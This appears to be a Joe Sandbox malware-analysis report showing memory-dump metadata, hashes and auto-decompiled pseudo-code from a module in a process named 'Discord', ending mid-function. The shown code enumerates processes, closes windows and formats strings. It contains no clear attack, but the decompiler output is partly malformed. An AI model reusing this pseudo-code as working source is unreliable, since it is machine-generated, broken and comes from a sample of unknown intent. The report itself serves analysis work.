Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _get_output_format$msvcrt.dll
API String ID: 1646373207-3432234555
Opcode ID: dfa1791d722c53ccfa88536ab67c3b4b14c9f1e8a77f41821a7c5019049834e6
Instruction ID: 3f23deea4a3a8252e93f0fa07d5c01c4e64ff918f00b601efebc3982b1d96d82
Opcode Fuzzy Hash: dfa1791d722c53ccfa88536ab67c3b4b14c9f1e8a77f41821a7c5019049834e6
Instruction Fuzzy Hash: BBE08CF54053019BCB00BF7A854F309BEF5BB46200FA1492CC84ADF205EB30A4488B87

Uniqueness

Uniqueness Score: -1.00%

Function 6DE93760 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6DE9376D
GetProcAddress.KERNEL32 ref: 6DE93781

Strings

_get_output_format, xrefs: 6DE93776
msvcrt.dll, xrefs: 6DE93766

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _get_output_format$msvcrt.dll
API String ID: 1646373207-3432234555
Opcode ID: 1137a773355fe831f30c08259f60fe1d19427faea13b3dade2d40ff39421c100
Instruction ID: 027db4f11c4890f33e29c81b356f2814f4df6011c8975493fd36e1d636e2ee0b
Opcode Fuzzy Hash: 1137a773355fe831f30c08259f60fe1d19427faea13b3dade2d40ff39421c100
Instruction Fuzzy Hash: 3ED0ECF44053018BCB007F7A954F2097EF5AB46101FA14928C846CE215EB3094488797

Uniqueness

Uniqueness Score: -1.00%

Function 6DE840D1 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

GdipBitmapGetPixel.GDIPLUS ref: 6DE8407D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE840E7
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE840F2
GdipBitmapGetPixel.GDIPLUS ref: 6DE841DA

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: BitmapGdipPixel$M_disposeRep10_ResumeSs4_Unwind_
String ID:
API String ID: 1042877503-0
Opcode ID: 77f7a2ef4102d76994500fe6bb85ef46c5d4ea236efdd49134ac80d16a1be09b
Instruction ID: 268e0458e6603eec1a356c0e673cecf6a0edf8bdd52e338a85cc50e2fde127a5
Opcode Fuzzy Hash: 77f7a2ef4102d76994500fe6bb85ef46c5d4ea236efdd49134ac80d16a1be09b
Instruction Fuzzy Hash: FF512570A0C745CFC321AF15C08468ABBF4FB88344F218D0EE9D997225EB319965CB83

Uniqueness

Uniqueness Score: -1.00%

Function 6DE92340 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6DE92391
MultiByteToWideChar.KERNEL32 ref: 6DE923D1
MultiByteToWideChar.KERNEL32 ref: 6DE92470

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Byte$CharMultiWide$Lead
String ID:
API String ID: 2933009993-0
Opcode ID: 69c3e93313982b0cace4ca61f55e973486ea8a48d7663e70ce46068c9f448437
Instruction ID: b887040a5ced5ce6756de6dd2e6a1fac954d2f1259468375ce4b03c36a194b65
Opcode Fuzzy Hash: 69c3e93313982b0cace4ca61f55e973486ea8a48d7663e70ce46068c9f448437
Instruction Fuzzy Hash: 1D4146709093069FDF20CF69C44439EBBE0FF56328F50856AE8A89B341D775D598CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8A869 Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E6DE8A869(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, struct HWND__* _a4, char _a8, intOrPtr _a16, char _a36, void* _a40, char _a332, char _a336, char _a360) {
				int _v0;
				void** _v4;
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v24;
				struct HWND__* _v28;
				void* _t34;
				int _t35;
				void* _t38;
				int _t40;
				int _t45;
				int _t47;
				int _t54;
				struct HWND__* _t56;
				void* _t66;
				void* _t72;
				void* _t80;
				void* _t82;
				void* _t85;
				void* _t88;
				void* _t92;

				while(1) {
					L26:
					__eax = __ecx;
					while(1) {
						L27:
						 *(__eax + 4) = __edx;
						__edx =  *(__eax - 4);
						_t28 = __eax - 4; // 0x22b7e
						__ecx = _t28;
						if(__esi < __edx) {
							goto L26;
						}
						__edi = __edi + 4;
						 *__eax = __esi;
						if(__ebx != __edi) {
							while(1) {
								__esi =  *__edi;
								__edx =  *(__edi - 4);
								_t30 = __edi - 4; // 0x22b82
								__eax = _t30;
								if(__edx > __esi) {
									goto L27;
								}
								__eax = __edi;
								__edi = __edi + 4;
								 *__eax = __esi;
								if(__ebx != __edi) {
									continue;
								} else {
								}
								goto L16;
							}
							continue;
						}
						L16:
						__edi =  *0x6de9e7e8;
						__eax =  *0x6de9e7e4;
						__ebx = __edi;
						_a8 = 0;
						__eax = E6DE95320(__eax, __edi);
						__esi = __eax;
						if(__eax == __edi) {
							__esi =  *0x6de9e7e8;
						} else {
							__edx =  *0x6de9e7e8;
							if(__edi == __edx) {
								__edx = __edi;
							} else {
								__edx = __edx - __ebx;
								__edx = __edx >> 2;
								if(__edx >> 2 != 0) {
									__eax = memmove(__esi, __edi, __edx);
									__edx =  *0x6de9e7e8;
									__edx =  *0x6de9e7e8 - __ebx;
								}
							}
							__esi = __esi + __edx;
							 *0x6de9e7e8 = __esi;
						}
						__ebx =  *0x6de9e7e4;
						if(__ebx != __esi) {
							__edi = IsWindow;
							do {
								__ebp =  *__ebx;
								__eax = IsWindow(__ebp);
								__esp = __esp - 4;
								if(__eax != 0) {
									_a4 = __ebp;
									_v0 = __ebp;
									L6DE8DCD8();
									_v0 = 0x32;
									__eax = _a16();
									__esp = __esp - 4;
									_v0 = __ebp;
									_v4 = __ebp;
									L6DE8DC68();
								}
								__ebx = __ebx + 4;
							} while (__esi != __ebx);
						}
						_v0 = 0x3e8;
						_a16();
						_v4 = 0x6de9e8e4;
						L6DE8DD20();
						_v0 = 0;
						_v4 = 2;
						 *0x6de9e8e4 = 0;
						_t34 = CreateToolhelp32Snapshot(??, ??);
						 *0x6de9e8e4 = _t34;
						_t72 =  &_a336;
						_v8 = _t34;
						_v4 = _t72;
						_t35 = Process32First(??, ??);
						_t85 = _t82 - 0xfffffffffffffff4;
						if(_t35 == 0) {
							CloseHandle( *0x6de9e8e4);
							_t38 = 0;
							goto L14;
						} else {
							_t66 =  &_a36;
							while(1) {
								_v8 = _t66;
								_t40 = Process32First( *0x6de9e8e8);
								_t88 = _t85 - 8;
								if(_t40 == 0) {
									break;
								}
								_t80 = 0;
								do {
									_v12 = _t66;
									_v16 =  *0x6de9e8e8;
									_t80 =  ==  ? 1 : _t80;
									_t45 = Process32Next(??, ??);
									_t88 = _t88 - 8;
								} while (_t45 != 0);
								if(_t80 == 0 && strstr( &_a360,  *0x6de9e840) != 0) {
									_v16 = 1;
									_v20 = _a332;
									L6DE8DCD0();
								}
								_v16 = _t72;
								_t47 = Process32Next( *0x6de9e8e4);
								_t85 = _t88 - 8;
								if(_t47 != 0) {
									continue;
								} else {
									CloseHandle( *0x6de9e8e8);
									CloseHandle( *0x6de9e8e4);
									_v24 = 0x3e8;
									_v8();
									_t54 = IsWindow( *0x6de9e868);
									_t92 = _t85 - 0xfffffffffffffff8;
									if(_t54 != 0) {
										PostMessageA( *0x6de9e868, 0x10, 0, 0);
										_t92 = _t92 - 0x10;
									}
									_v28 = 0x3e8;
									_v12();
									_t56 =  *0x6de9e868;
									_v28 = _t56;
									 *(_t92 - 4) = _t56;
									L6DE8DC68();
									return 1;
								}
								goto L35;
							}
							CloseHandle( *0x6de9e8e8);
							_t38 = 0;
							L14:
							return _t38;
						}
						L35:
					}
				}
			}

0x6de8a870
0x6de8a870
0x6de8a870
0x6de8a872
0x6de8a872
0x6de8a872
0x6de8a875
0x6de8a878
0x6de8a878
0x6de8a87d
0x00000000
0x00000000
0x6de8a87f
0x6de8a882
0x6de8a886
0x6de8a88c
0x6de8a88c
0x6de8a88e
0x6de8a891
0x6de8a891
0x6de8a896
0x00000000
0x00000000
0x6de8a898
0x6de8a89a
0x6de8a89f
0x6de8a8a1
0x00000000
0x00000000
0x6de8a8a3
0x00000000
0x6de8a8a1
0x00000000
0x6de8a88c
0x6de8a522
0x6de8a522
0x6de8a528
0x6de8a52d
0x6de8a52f
0x6de8a53b
0x6de8a542
0x6de8a544
0x6de8a8d7
0x6de8a54a
0x6de8a54a
0x6de8a552
0x6de8a8d0
0x6de8a558
0x6de8a558
0x6de8a55c
0x6de8a561
0x6de8a8b3
0x6de8a8b8
0x6de8a8be
0x6de8a8be
0x6de8a561
0x6de8a567
0x6de8a569
0x6de8a569
0x6de8a56f
0x6de8a577
0x6de8a57d
0x6de8a590
0x6de8a590
0x6de8a595
0x6de8a597
0x6de8a59c
0x6de8a59e
0x6de8a5a2
0x6de8a5a5
0x6de8a5aa
0x6de8a5b1
0x6de8a5b5
0x6de8a5b8
0x6de8a5bc
0x6de8a5bf
0x6de8a5bf
0x6de8a585
0x6de8a588
0x6de8a590
0x6de8a31c
0x6de8a323
0x6de8a32a
0x6de8a331
0x6de8a336
0x6de8a33e
0x6de8a345
0x6de8a34f
0x6de8a357
0x6de8a35c
0x6de8a363
0x6de8a366
0x6de8a36a
0x6de8a36f
0x6de8a374
0x6de8a4db
0x6de8a4e1
0x00000000
0x6de8a37a
0x6de8a37a
0x6de8a383
0x6de8a388
0x6de8a38f
0x6de8a394
0x6de8a399
0x00000000
0x00000000
0x6de8a39f
0x6de8a3a1
0x6de8a3b1
0x6de8a3b5
0x6de8a3b8
0x6de8a3bb
0x6de8a3c0
0x6de8a3c3
0x6de8a3c9
0x6de8a3ee
0x6de8a3f6
0x6de8a3f9
0x6de8a3f9
0x6de8a403
0x6de8a40a
0x6de8a40f
0x6de8a414
0x00000000
0x6de8a41a
0x6de8a428
0x6de8a435
0x6de8a43a
0x6de8a441
0x6de8a450
0x6de8a456
0x6de8a45b
0x6de8a47d
0x6de8a483
0x6de8a483
0x6de8a486
0x6de8a48d
0x6de8a491
0x6de8a499
0x6de8a49d
0x6de8a4a0
0x6de8a4b4
0x6de8a4b4
0x00000000
0x6de8a414
0x6de8a4bd
0x6de8a4c3
0x6de8a4c8
0x6de8a4d2
0x6de8a4d2
0x00000000
0x6de8a374
0x6de8a872

APIs

_ZSt8__uniqueIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops19_Iter_equal_to_iterEET_SB_SB_T0_.DPUB1 ref: 6DE8A53B
IsWindow.USER32 ref: 6DE8A595
_Z4QuiPP6HWND__S0_.DFO1 ref: 6DE8A5A5
_Z3CokP6HWND__S0_.DFO1 ref: 6DE8A5BF
_ZSt9__find_ifIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops16_Iter_equals_valIKS3_EEET_SD_SD_T0_St26random_access_iterator_tag.DPUB1 ref: 6DE8A626
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8A646
_Z6FermeWP6HWND__S0_.DFO1 ref: 6DE8A656

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: N9__gnu_cxx17__normal_iteratorSt6vectorWindow$FermeForceForegroundIter_equal_to_iterIter_equals_valS0_5__ops16_S0_5__ops19_St26random_access_iterator_tagSt8__uniqueSt9__find_if
String ID:
API String ID: 1126466077-0
Opcode ID: c81d89dfcc9f7b3c4934deb7419cbf9602c5a790875d3bd2a2b5c7eb040f3a85
Instruction ID: 33b3619aa33c1f5787dedcdc073c717c84058d08094c862dafaddcd0890f39cd
Opcode Fuzzy Hash: c81d89dfcc9f7b3c4934deb7419cbf9602c5a790875d3bd2a2b5c7eb040f3a85
Instruction Fuzzy Hash: D4219F71A457028FDB019F18D18462DF7F2BF81708F2A851EE59CAB356EB70E841CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DE903F2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 57
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DE903F2(char* __edi) {
				char _t260;
				signed int _t265;
				char* _t270;
				char* _t272;
				signed char _t275;
				char* _t276;
				signed int* _t277;
				signed int _t284;
				signed int _t290;
				char* _t292;
				char* _t294;
				char* _t296;
				char** _t298;
				intOrPtr* _t301;

				L0:
				while(1) {
					L0:
					_t292 = __edi;
					if( *(_t301 + 0x14) - 2 <= 1) {
						goto L91;
					}
					L11:
					__ebx =  *__eax;
					__ebp = __ebp + 4;
					__eflags = __ebx;
					if(__ebx == 0) {
						L52:
						__edx = 6;
						__ebx = "(null)";
						L13:
						__ecx =  &(__esp[0xd]);
						__eax = __ebx;
						__eax = E6DE8EEC0(__ebx, __ecx, __edx);
						while(1) {
							L1:
							_t260 =  *_t292;
							_t272 = _t292 + 1;
							_t296 = _t272;
							if(_t260 == 0) {
								break;
							}
							L2:
							L2:
							if(_t260 != 0x25) {
								_t292 = _t272;
								E6DE8ED70(_t260, _t301 + 0x34);
							} else {
								goto L3;
							}
							continue;
							L3:
							 *(_t301 + 0x40) = 0xffffffff;
							 *(_t301 + 0x3c) = 0xffffffff;
							 *(_t301 + 0x14) = 0;
							 *((intOrPtr*)(_t301 + 0x38)) =  *((intOrPtr*)(_t301 + 0x80));
							_t284 =  *(_t292 + 1) & 0x000000ff;
							 *(_t301 + 0x18) = _t301 + 0x3c;
							 *(_t301 + 0x10) = 0;
							if(_t284 == 0) {
								L8:
								_t292 = _t296;
								_t260 =  *_t292;
								_t272 = _t292 + 1;
								_t296 = _t272;
								if(_t260 != 0) {
									goto L2;
								}
								break;
							} else {
								goto L4;
							}
							do {
								L4:
								_t275 = _t284 - 0x20;
								_t265 = _t284;
								_t294 = _t296 + 1;
								if(_t275 > 0x5a) {
									L69:
									_t276 =  *(_t301 + 0x10);
									__eflags = _t276 - 4;
									if(_t276 == 4) {
										L122:
										_t292 = _t272;
										E6DE8ED70(0x25, _t301 + 0x34);
										goto L1;
									}
									L70:
									__eflags = _t284 - 0x30 - 9;
									if(_t284 - 0x30 > 9) {
										goto L122;
									}
									L71:
									__eflags = _t276;
									if(_t276 != 0) {
										__eflags = _t276 - 2;
										_t288 =  !=  ? _t276 : 3;
										 *(_t301 + 0x10) =  !=  ? _t276 : 3;
									} else {
										 *(_t301 + 0x10) = 1;
									}
									__eflags =  *(_t301 + 0x18);
									if(__eflags == 0) {
										L64:
										_t284 =  *(_t296 + 1) & 0x000000ff;
										goto L65;
									} else {
										L74:
										_t277 =  *(_t301 + 0x18);
										_t290 =  *_t277;
										__eflags = _t290;
										if(__eflags < 0) {
											L106:
											 *_t277 = _t265 - 0x30;
											_t284 =  *(_t296 + 1) & 0x000000ff;
											_t296 = _t294;
										} else {
											 *( *(_t301 + 0x18)) = _t265 + (_t290 + _t290 * 4) * 2 - 0x30;
											_t284 =  *(_t296 + 1) & 0x000000ff;
											L65:
											_t296 = _t294;
										}
										goto L7;
									}
								}
								L5:
								switch( *((intOrPtr*)((_t275 & 0x000000ff) * 4 +  &M6DE9829C))) {
									case 0:
										L88:
										__eax = __esp[4];
										__eflags = __eax;
										if(__eflags != 0) {
											goto L64;
										}
										L89:
										__esp[0xe] = __esp[0xe] | 0x00000040;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										goto L7;
									case 1:
										goto L69;
									case 2:
										L86:
										__eax = __esp[4];
										__eflags = __eax;
										if(__eflags != 0) {
											goto L64;
										}
										L87:
										__esp[0xe] = __esp[0xe] | 0x00000800;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										goto L7;
									case 3:
										L90:
										__edx =  &(__esp[0xd]);
										__eax = E6DE8ED70(__eax, __edx);
										goto L1;
									case 4:
										L63:
										__eax = __esp[4];
										__eflags = __eax;
										if(__eflags == 0) {
											L95:
											__esp[0xe] = __esp[0xe] | 0x00001000;
											__esp[0xa] = 0;
											L6DE936E8();
											__ecx =  &(__esp[0xa]);
											__esp[3] = __ecx;
											__esp[2] = 0x10;
											__esp[1] = __eax;
											__eax =  &(__esp[9]);
											 *__esp =  &(__esp[9]);
											__eax = E6DE924C0();
											__eflags = __eax;
											if(__eflags > 0) {
												__edx = __esp[9] & 0x0000ffff;
												__esp[0x14] = __dx;
											}
											__esp[0x13] = __eax;
											__edx =  *(__esi + 1) & 0x000000ff;
											__esi = __edi;
											goto L7;
										}
										goto L64;
									case 5:
										L59:
										__ecx = __esp[6];
										__eflags = __ecx;
										if(__eflags == 0) {
											goto L77;
										}
										L60:
										__eflags = __esp[4] & 0xfffffffd;
										if(__eflags != 0) {
											L94:
											__edx =  *(__esi + 1) & 0x000000ff;
											__esi = __edi;
											__esp[6] = 0;
											__esp[4] = 4;
											goto L7;
										}
										L61:
										__edx =  *__ebp;
										__eax = __ebp + 4;
										__ecx = __esp[6];
										__eflags = __edx;
										 *__ecx = __edx;
										if(__eflags < 0) {
											L115:
											__edx = __esp[4];
											__eflags = __esp[4];
											if(__eflags != 0) {
												L121:
												__esp[0x10] = 0xffffffff;
												__ebp = __eax;
												__edx =  *(__esi + 1) & 0x000000ff;
												__esp[6] = 0;
												__esi = __edi;
												goto L7;
											}
											L116:
											__esp[0xe] = __esp[0xe] | 0x00000400;
											__esp[0xf] =  ~(__esp[0xf]);
										}
										L62:
										__edx =  *(__esi + 1) & 0x000000ff;
										__ebp = __eax;
										__esi = __edi;
										__esp[6] = 0;
										goto L7;
									case 6:
										L57:
										__eax = __esp[4];
										__eflags = __eax;
										if(__eflags != 0) {
											goto L64;
										} else {
											__esp[0xe] = __esp[0xe] | 0x00000100;
											__edx =  *(__esi + 1) & 0x000000ff;
											__esi = __edi;
											goto L7;
										}
									case 7:
										L78:
										__eax = __esp[4];
										__eflags = __eax;
										if(__eflags != 0) {
											goto L64;
										}
										L79:
										__esp[0xe] = __esp[0xe] | 0x00000400;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										goto L7;
									case 8:
										L76:
										__eflags = __esp[4] - 1;
										if(__eflags <= 0) {
											L105:
											__eax =  &(__esp[0x10]);
											__esp[0x10] = 0;
											__edx =  *(__esi + 1) & 0x000000ff;
											__esi = __edi;
											__esp[6] = __eax;
											__esp[4] = 2;
											goto L7;
										}
										L77:
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										__esp[4] = 4;
										goto L7;
									case 9:
										L68:
										__ecx = __esp[4];
										__eflags = __ecx;
										if(__eflags == 0) {
											L93:
											__esp[0xe] = __esp[0xe] | 0x00000200;
											__edx =  *(__esi + 1) & 0x000000ff;
											__esi = __edi;
											goto L7;
										}
										goto L69;
									case 0xa:
										L66:
										__eax = __esp[0xe];
										__eflags = __al & 0x00000004;
										if((__al & 0x00000004) != 0) {
											goto L17;
										}
										goto L67;
									case 0xb:
										L82:
										__esp[0x10] = 0xffffffff;
										goto L83;
									case 0xc:
										L80:
										__eax = __esp[0xe];
										__eflags = __al & 0x00000004;
										if((__al & 0x00000004) != 0) {
											goto L19;
										}
										goto L81;
									case 0xd:
										L84:
										__eax = __esp[0xe];
										__eflags = __al & 0x00000004;
										if((__al & 0x00000004) != 0) {
											goto L50;
										}
										goto L85;
									case 0xe:
										L55:
										__eax = __esp[0xe];
										__eflags = __al & 0x00000004;
										if((__al & 0x00000004) != 0) {
											goto L48;
										}
										goto L56;
									case 0xf:
										L32:
										__edx =  *(__esi + 1) & 0x000000ff;
										__eflags = __dl - 0x36;
										if(__dl == 0x36) {
											L103:
											__eflags =  *(__esi + 2) - 0x34;
											if(__eflags == 0) {
												__edi = __esi + 3;
												__edx =  *(__esi + 3) & 0x000000ff;
												__esp[5] = 3;
												__esi = __edi;
												__esp[4] = 4;
											} else {
												__edx = 0x36;
												__esi = __edi;
												__esp[5] = 2;
												__esp[4] = 4;
											}
											goto L7;
										}
										L33:
										__eflags = __dl - 0x33;
										if(__eflags != 0) {
											goto L54;
										} else {
											__eflags =  *(__esi + 2) - 0x32;
											if(__eflags == 0) {
												__edi = __esi + 3;
												__edx =  *(__esi + 3) & 0x000000ff;
												__esp[5] = 2;
												__esi = __edi;
												__esp[4] = 4;
											} else {
												__edx = 0x33;
												__esi = __edi;
												__esp[5] = 2;
												__esp[4] = 4;
											}
											goto L7;
										}
									case 0x10:
										L31:
										__esp[0xe] = __esp[0xe] | 0x00000004;
										__edx =  *(__esi + 1) & 0x000000ff;
										__esi = __edi;
										__esp[4] = 4;
										goto L7;
									case 0x11:
										goto L91;
									case 0x12:
										L25:
										__eflags = __esp[5] - 3;
										if(__esp[5] == 3) {
											__ecx =  *__ebp;
											__ebp = __ebp + 8;
											__ebx =  *(__ebp - 4);
											__esp[0xa] = __ecx;
											__esp[0xb] =  *(__ebp - 4);
										} else {
											__eflags = __esp[5] - 2;
											if(__esp[5] == 2) {
												__esi =  *__ebp;
												__ebp = __ebp + 4;
												__esp[0xb] = 0;
												__esp[0xa] = __esi;
											} else {
												__esi =  *__ebp;
												__edx = __ebp + 4;
												__eflags = __esp[5] - 1;
												__esp[0xb] = 0;
												__esp[0xa] = __esi;
												if(__esp[5] == 1) {
													__ecx = __esp[0xa] & 0x0000ffff;
													__ebp = __edx;
													__esp[0xb] = 0;
													__esp[0xa] = __esp[0xa] & 0x0000ffff;
												} else {
													__eflags = __esp[5] - 4;
													__ebp = __edx;
													if(__esp[5] == 4) {
														__edx = __esp[0xa] & 0x000000ff;
														__esp[0xb] = 0;
														__esp[0xa] = __esp[0xa] & 0x000000ff;
													}
												}
											}
										}
										__eflags = __eax - 0x75;
										if(__eax == 0x75) {
											goto L24;
										} else {
											__edx = __esp[0xa];
											__esi =  &(__esp[0xd]);
											__ecx = __esp[0xb];
											__eax = E6DE8F2B0(__eax, __ecx, __edx, __esi);
											goto L1;
										}
									case 0x13:
										L16:
										__esp[0xe] = __esp[0xe] | 0x00000020;
										__eflags = __al & 0x00000004;
										__esp[0xe] = __esp[0xe] | 0x00000020;
										if((__al & 0x00000004) == 0) {
											L67:
											__ebx = __ebp + 8;
											[tword [esp] =  *__ebp;
											__ebp = __ebp + 8;
											__eax =  &(__esp[0xd]);
											__eax = E6DE8FD70( &(__esp[0xd]));
											goto L1;
										}
										L17:
										__ebx = __ebp + 0xc;
										[tword [esp] = [tword [ebp];
										__ebp = __ebp + 0xc;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FD70( &(__esp[0xd]));
										goto L1;
									case 0x14:
										L14:
										__edx = __esp[5];
										__eax = __ebp;
										__esp[0x10] = 0xffffffff;
										__edx = __esp[5] - 2;
										__eflags = __esp[5] - 2 - 1;
										if(__eflags <= 0) {
											L83:
											__eax =  *__ebp;
											__ebx = __ebp + 4;
											__edx = 1;
											__ecx =  &(__esp[0xd]);
											__ebp = __ebp + 4;
											__esp[0xa] = __ax;
											__eax =  &(__esp[0xa]);
											__eax = E6DE8EDD0( &(__esp[0xa]), __ecx, 1, __eflags);
										} else {
											__eax =  *__eax;
											__ecx =  &(__esp[0xd]);
											__edx = 1;
											__ebp = __ebp + 4;
											__esp[0xa] = __al;
											__eax =  &(__esp[0xa]);
											__eax = E6DE8EEC0( &(__esp[0xa]), __ecx, 1);
										}
										goto L1;
									case 0x15:
										L20:
										__esp[0xe] = __esp[0xe] | 0x00000080;
										__eflags = __esp[5] - 3;
										if(__esp[5] == 3) {
											__eax =  *__ebp;
											__ebp = __ebp + 8;
											__edx =  *(__ebp - 4);
											__esp[0xa] = __eax;
											__esp[0xb] =  *(__ebp - 4);
										} else {
											__eflags = __esp[5] - 2;
											if(__esp[5] == 2) {
												__eax =  *__ebp;
												__ebp = __ebp + 4;
												__esp[0xa] = __eax;
												__esp[0xb] = __eax;
											} else {
												__eax =  *__ebp;
												__edx = __ebp + 4;
												__esp[0xa] = __eax;
												__eax = __eax >> 0x1f;
												__eflags = __esp[5] - 1;
												__esp[0xb] = __eax;
												if(__esp[5] == 1) {
													__eax = __esp[0xa];
													__ebp = __edx;
													__esp[0xa] = __eax;
													__esp[0xb] = __eax;
												} else {
													__eflags = __esp[5] - 4;
													__ebp = __edx;
													if(__esp[5] == 4) {
														__eax = __esp[0xa];
														__esp[0xa] = __eax;
														__esp[0xb] = __eax;
													}
												}
											}
										}
										L24:
										__eax = __esp[0xa];
										__ecx =  &(__esp[0xd]);
										__edx = __esp[0xb];
										__eax = E6DE8EFF0(__esp[0xa], __ecx, __edx);
										goto L1;
									case 0x16:
										L18:
										__esp[0xe] = __esp[0xe] | 0x00000020;
										__eflags = __al & 0x00000004;
										__esp[0xe] = __esp[0xe] | 0x00000020;
										if((__al & 0x00000004) == 0) {
											L81:
											__ebx = __ebp + 8;
											[tword [esp] =  *__ebp;
											__ebp = __ebp + 8;
											__eax =  &(__esp[0xd]);
											__eax = E6DE8FA60( &(__esp[0xd]));
											goto L1;
										}
										L19:
										__ebx = __ebp + 0xc;
										[tword [esp] = [tword [ebp];
										__ebp = __ebp + 0xc;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FA60( &(__esp[0xd]));
										goto L1;
									case 0x17:
										L49:
